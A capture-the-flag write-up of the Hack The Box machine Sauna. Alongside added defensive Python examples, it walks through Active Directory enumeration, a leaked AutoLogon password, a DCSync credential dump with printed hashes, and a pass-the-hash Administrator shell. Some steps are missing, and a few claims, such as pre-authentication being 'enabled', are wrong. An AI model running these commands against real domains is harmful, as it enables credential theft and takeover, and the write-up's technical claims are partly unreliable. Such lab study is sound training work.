
# Hack The Box Write-Up Sauna - 10.10.10.175

Technology is just a tool. In terms of getting the kids working together and motivating them, the teacher is the most important.

Bill Gates

# Recon

## Port scan with Nmap

As always, I start the initial enumeration with a port scan with Nmap.

```
nmap -sC -sV -oA ./nmap/sauna.txt 10.10.10.175
```

The results of the port scan.

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 21:38 CET
Nmap scan report for 10.10.10.175
Host is up (0.061s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     34A87605B2aCFdD891c1
|     version
|     bind
|   NULL:
|_    34A87605B2aCFdD891c1
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-16 04:38:52Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  tcpwrapped
445/tcp  open  microsoft-ds?
464/tcp  open  tcpwrapped
593/tcp  open  tcpwrapped
636/tcp  open  tcpwrapped
3268/tcp open  tcpwrapped
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/15%Time=5E4856E2%P=x86_64-pc-linux-gnu%r(NULL
SF:,2C,"\0\*\+\t\x81\x82\0\x01\0\0\0\0\0\0\x1434A87605B2aCFdD891c1\x03com\
SF:0\0\x01\0\x01")%r(DNSVersionBindReqTCP,4C,"\0\*\+\t\x81\x82\0\x01\0\0\0
SF:\0\0\0\x1434A87605B2aCFdD891c1\x03com\0\0\x01\0\x01\0\x1e\0\x06\x81\x04
SF:\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m52s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-02-16T04:40:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 283.79 seconds
```

The open port that attracts my attention is port 80/tcp (HTTP). This port is the starting point of my reconnaissance.

# Enumeration

## Enumeration Web Server

In my web browser, I go to http://10.10.10.175/ and land on the website of the Egotistical Bank.

I looked around the website. On the page http://10.10.10.175/about.html#team some team members are listed. Pretty interesting: now I know the members of this company.

I note down the users in a text-file.

• Fergus Smith
• Hugo Bear
• Steven Kerb
• Shaun Coins
• Bowie Taylor
• Sophie Driver

Let’s try to find out if those users exist on the server. I also need to know the username convention; then maybe we can try to brute-force or guess their passwords.

## User enumeration with LDAP

First, I tried to enumerate the users with enum4linux, but that script finds nothing useful. As the LDAP port 389/tcp is open on this box, I invoked this command for user enumeration.

```
~$ nmap -p 389 --script ldap-search 10.10.10.175
...
| dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
|_ dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds
```

I now have the domain name EGOTISTICAL-BANK.local and one user account, Hugo Smith. On the team members page there is no member with this name; it seems to be a combination of the team members Fergus Smith and Hugo Bear. I also run Nmap with the krb5-enum-users script.

```
~$ nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='EGOTISTICAL-BANK.local' 10.10.10.175
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 22:19 CET
Nmap scan report for 10.10.10.175
Host is up (0.029s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|_    [email protected]
Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds
```

The user account [email protected] is present by default on a Windows machine, so this is not very relevant information for the moment. I have found some users; let’s try to narrow down the usernames and poke at their passwords.

## Ticket-Granting-Ticket grab fsmith

I do not know the username convention of the Active Directory, so I need to guess usernames with GetNPUsers.py. After some trying, I figured out that the username convention is the first letter of the first name followed by the full surname (e.g. fsmith). I invoked the command below to obtain the TGT for the user Fergus Smith. This is possible since Kerberos Pre-Authentication is enabled for this account.
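GetNPUsers.py can only obtain an AS-REP for accounts whose userAccountControl carries the DONT_REQ_PREAUTH bit (0x400000), so that bit is what a defender audits and clears. The Python below is an added example, not code from this write-up; the sample records and account names are constructed, and no directory is queried.

```python
# Added example (not from the write-up): find domain accounts that do not require
# Kerberos pre-authentication. Sample records are constructed; nothing touches LDAP.

# Well-known userAccountControl bit flags from the Active Directory schema.
ACCOUNTDISABLE       = 0x000002
DONT_EXPIRE_PASSWORD = 0x010000
DONT_REQ_PREAUTH     = 0x400000

# OID of the LDAP_MATCHING_RULE_BIT_AND rule: tests one bit of an integer attribute
# on the server side, so the directory does the filtering.
LDAP_BIT_AND = "1.2.840.113556.1.4.803"

def preauth_disabled_filter(include_disabled=False):
    """Build the LDAP filter a defender would hand to ldapsearch or Get-ADUser."""
    user = "(objectClass=user)"
    bit = f"(userAccountControl:{LDAP_BIT_AND}:={DONT_REQ_PREAUTH})"
    if include_disabled:
        return f"(&{user}{bit})"
    not_disabled = f"(!(userAccountControl:{LDAP_BIT_AND}:={ACCOUNTDISABLE}))"
    return f"(&{user}{bit}{not_disabled})"

def accounts_without_preauth(records):
    """Return sAMAccountNames of enabled accounts whose UAC has DONT_REQ_PREAUTH set."""
    hits = []
    for rec in records:
        uac = int(rec["userAccountControl"])
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(rec["sAMAccountName"])
    return hits

# Constructed sample, shaped like a directory export (NORMAL_ACCOUNT = 0x200).
SAMPLE_RECORDS = [
    {"sAMAccountName": "fsmith",      "userAccountControl": 0x410200},  # pre-auth not required
    {"sAMAccountName": "hsmith",      "userAccountControl": 0x010200},  # normal account
    {"sAMAccountName": "old_svc",     "userAccountControl": 0x400202},  # pre-auth off, but disabled
    {"sAMAccountName": "svc_loanmgr", "userAccountControl": 0x010200},
]

if __name__ == "__main__":
    print(preauth_disabled_filter())
    print(accounts_without_preauth(SAMPLE_RECORDS))  # ['fsmith']
```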

# Privilege Escalation

## Enumeration for root

I have owned the user on this box and start the enumeration for getting root. As always, I need to know what kind of user I am and which privileges this account has.

```
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami /all

USER INFORMATION
----------------

User Name              SID
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

The output is interesting. I see that this user account has the SeChangeNotifyPrivilege privilege. With this privilege, the user can bypass some Windows security checks: Bypass Traverse Checking determines which users can traverse directory or file system folder trees even though they might not have permissions on the traversed directory or folder itself. I keep this in mind; I do not know yet whether I will need this ‘exploit’.

## Enumeration with WindowsEnum.ps1

I need to do more enumeration. For this step I use the script WindowsEnum.ps1, which can be downloaded from GitHub. Before uploading the script to the box, I created the hidden folder .enum in C:\. I always create this folder so that other hackers do not steal my information. Everybody needs to learn, right? I invoked the commands below to prepare the environment.

```
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../../../
*Evil-WinRM* PS C:\> mkdir .enum


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/17/2020  10:55 AM                .enum


*Evil-WinRM* PS C:\> cd .enum
*Evil-WinRM* PS C:\.enum> upload WindowsEnum.ps1
Info: Uploading WindowsEnum.ps1 to C:\.enum\WindowsEnum.ps1

Data: 9492 bytes of 9492 bytes copied

Info: Upload successful!
```

Now I can run the script.

```
*Evil-WinRM* PS C:\.enum> upload WindowsEnum.ps1
...
------------------------------------------
User Autologon Registry Items
------------------------------------------

DefaultDomainName DefaultUserName                 DefaultPassword
----------------- ---------------                 ---------------
EGOTISTICALBANK   EGOTISTICALBANK\svc_loanmanager Moneymakestheworldgoround!
...
```

After the script has run for a while, the username and password of the user svc_loanmanager become visible from the registry: the AutoLogon property in the registry was set for the user account svc_loanmanager.

svc_loanmanager:Moneymakestheworldgoround!
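The check WindowsEnum.ps1 performed here can be reproduced from plain `reg query` output collected from any host. The Python below is an added example, not code from this write-up or from WindowsEnum.ps1: it parses such output and reports an AutoLogon password kept in clear text. The sample output is constructed from the values found on this box, with the user name in the form the Winlogon key normally holds.

```python
# Added example (not from the write-up): audit the Winlogon AutoLogon values from
#   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# The sample output at the bottom is constructed.
import re

# reg query prints each value as "    <name>    <REG_type>    <data>" under the key path.
_VALUE_LINE = re.compile(r"^\s{2,}(\S+)\s+(REG_[A-Z_]+)\s*(.*)$")

def parse_reg_query(text):
    """Return {value_name: (reg_type, data)} for one key's reg query output."""
    values = {}
    for line in text.splitlines():
        m = _VALUE_LINE.match(line)
        if m:
            name, rtype, data = m.groups()
            values[name] = (rtype, data.strip())
    return values

def autologon_findings(values):
    """Describe why the Winlogon values are risky; an empty list means nothing found."""
    findings = []
    auto = values.get("AutoAdminLogon", ("", "0"))[1]
    user = values.get("DefaultUserName", ("", ""))[1]
    domain = values.get("DefaultDomainName", ("", ""))[1]
    pwd = values.get("DefaultPassword", (None, ""))[1]
    if pwd:
        who = f"{domain}\\{user}" if domain else user
        # Any local user can read this key, so the credential is exposed.
        findings.append(f"DefaultPassword stored in clear text for {who}")
    if auto == "1" and not pwd:
        # AutoLogon still works; the password then lives in the LSA DefaultPassword secret.
        findings.append(f"AutoAdminLogon enabled for {user}; password held in LSA secret")
    return findings

SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    svc_loanmanager
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!
"""

if __name__ == "__main__":
    for finding in autologon_findings(parse_reg_query(SAMPLE_REG_QUERY)):
        print(finding)
```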

# Lateral Movement

## From f.smith to user svc_loanmanager

As this user is a member of the group Remote Management Users, the next step is obvious: create a remote PowerShell session to the box with this user. I invoked this command:

```
evil-winrm -u svc_loanmgr -p Moneymakestheworldgoround! -i 10.10.10.175
```

I land in a shell with this user account. I ran the WindowsEnum.ps1 script again, but this time it returns nothing useful. I searched around some more, but there was nothing useful to find. I have

## Enumeration with Bloodhound

This whole box gives me flashbacks to an earlier box named Forest. There I took the dog out of his kennel, and I think it is now time to let this dog out again. I uploaded the ingestor SharpHound.ps1 to my working directory on this box and ran the script.

```
*Evil-WinRM* PS C:\.enum> upload SharpHound.ps1
Info: Uploading SharpHound.ps1 to C:\.enum\SharpHound.ps1

Data: 1296724 bytes of 1296724 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\.enum> . .\Sharphound.ps1
*Evil-WinRM* PS C:\.enum> Invoke-Bloodhound -collectionmethod All -Domain "EGOTISTICALBANK.local" -ldapuser svc_loanmgr -ldappass Moneymakestheworldgoround!
*Evil-WinRM* PS C:\.enum> download 20200217203951_BloodHound.zip
Info: Downloading C:\.enum\20200217203951_BloodHound.zip to 20200217203951_BloodHound.zip

Info: Download successful!
```

I booted up BloodHound and uploaded my zip file to it.

The user svc_loanmgr has the GetChangesAll and GetChanges privileges; with these permissions I am able to perform a DCSync attack on this box. I could run DCSync locally with Invoke-Mimikatz, but this time I will run it remotely with secretsdump.py from Impacket.
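Before the dump, this is what the same activity looks like to a defender: a DCSync call shows up on the domain controller as Security event 4662 in which a replication extended right is exercised by an account that is not a domain controller (the "Audit Directory Service Access" subcategory must be enabled for these events to exist). The Python below is an added example, not code from this write-up; the events are constructed, and the DC allowlist and the field layout are assumptions about how the events were exported.

```python
# Added example (not from the write-up): flag DCSync-style replication in
# Security event 4662 records. Sample events below are constructed.

# Control access right GUIDs that a DRSUAPI replication request needs; these are
# the rights BloodHound shows as GetChanges and GetChangesAll.
DS_REPLICATION_GET_CHANGES     = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

def is_dcsync(event, dc_accounts):
    """True when a 4662 event shows a replication right exercised by a non-DC account."""
    # Access mask 0x100 is "control access", i.e. an extended right on the object.
    if event.get("EventID") != 4662 or event.get("AccessMask") != "0x100":
        return False
    rights = {g.lower().strip("{}") for g in event.get("Properties", [])}
    if not rights & REPLICATION_RIGHTS:
        return False
    allowed = {a.upper() for a in dc_accounts}  # DC computer accounts replicate legitimately
    return event.get("SubjectUserName", "").upper() not in allowed

def dcsync_alerts(events, dc_accounts):
    """Return (subject, domain) pairs that deserve an alert."""
    return [(e["SubjectUserName"], e.get("SubjectDomainName", ""))
            for e in events if is_dcsync(e, dc_accounts)]

# Constructed sample events, reduced to the fields the check needs.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "SubjectDomainName": "EGOTISTICALBANK",
     "AccessMask": "0x100", "Properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"]},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICALBANK",
     "AccessMask": "0x100", "Properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
                                           "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    # Same access mask, but the property is the "user" schema class, not a replication right.
    {"EventID": 4662, "SubjectUserName": "fsmith", "SubjectDomainName": "EGOTISTICALBANK",
     "AccessMask": "0x100", "Properties": ["{bf967aba-0de6-11d0-a285-00aa003049e2}"]},
    {"EventID": 4624, "SubjectUserName": "svc_loanmgr", "Properties": []},
]

if __name__ == "__main__":
    print(dcsync_alerts(SAMPLE_EVENTS, dc_accounts=["SAUNA$"]))  # [('svc_loanmgr', 'EGOTISTICALBANK')]
```

The mitigation is the same check in reverse: only domain controller accounts (and a known sync service such as Azure AD Connect) should hold these two rights on the domain object.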

```
~$ sudo python3 secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
[sudo] password for kali:
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7a2965077fddedf348d938e4fa20ea1b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:a90968c91de5f77ac3b7d938bd760002373f71e14e1a027b2d93d1934d64754a
SAUNA$:aes128-cts-hmac-sha1-96:0bf0c486c1262ab6cf46b16dc3b1b198
SAUNA$:des-cbc-md5:b989ecc101ae4ca1
[*] Cleaning up...
```

## Own Sauna

The last thing I need to do is to get a shell on this box as the user account Administrator. With wmiexec.py there is no need to crack the password of this account.

```
~$ python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff administrator@10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
egotisticalbank\administrator

C:\>cd Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
f3ee04965c68257382e31502cc5e881f

C:\Users\Administrator\Desktop>
```

Thanks for reading this write-up! Did you enjoy it, or learn something from it? Please consider giving a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)